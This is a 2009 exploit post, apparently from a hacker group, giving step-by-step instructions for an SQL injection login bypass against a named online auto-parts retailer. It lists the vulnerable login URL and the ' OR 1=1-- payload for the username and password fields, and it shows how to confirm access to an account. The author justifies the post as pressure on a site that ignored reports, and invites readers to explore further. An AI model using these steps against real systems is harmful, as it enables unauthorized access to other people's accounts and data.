============================================================== ===================[¦¦¦¦TeamQuarantine¦¦¦¦]=================== ===================[¦¦¦¦ 2009 ¦¦¦¦]=================== ============[¦¦¦¦TeamQuarantine@hushmail.com¦¦¦¦]============= ===================[¦¦¦¦ Author: Gm0 ¦¦¦¦]=================== ============================================================== ==============[¦¦¦¦ autopartswarehouse.com ¦¦¦¦]============== ========[¦¦¦¦ SQL Injection Authentication bypass ¦¦¦¦]======= ============================================================== ============================================================== A Site Note: I don't usually post site-specific exploits, but due to the fact that they have IGNORED all of our attempts to explain this issue to them, I feel they would learn best if more people showed them what a problem this could be. Be nice... ;) ============================================================== ======================[¦¦¦¦ USAGE: ¦¦¦¦]====================== ============================================================== Vulnerable: https://www.autopartswarehouse.com/myaccount/login/ 1) Fire up your favorite HTTP/HTTPS post/header editor (tamperdata) 2) Supply valid email-address credentials and password (due to client-side validation), or simply modify client side validaton with firebug to accept "improper" email-address formatting 3) Modify 'username' and 'password' parameter values to ' OR 1=1-- (simple, I know, which is why they should be informed) 4) Submit modified request 5) Click 'edit profile' link for proof of logged-in status (https://www.autopartswarehouse.com/myaccount/edit_profile/) ============================================================== ====================[¦¦¦¦ FINAL WORD ¦¦¦¦]==================== ============================================================== I _KNOW_ more can be done with this. Explore, learn, have fun. (be responsible) Maybe now they will take notice . . . ============================================================== ======================[¦¦¦¦ SHOUTZ ¦¦¦¦]====================== ============================================================== Everyone at TeamQuarantine Including _YOU_ A.G. But certainly not J.L. HA!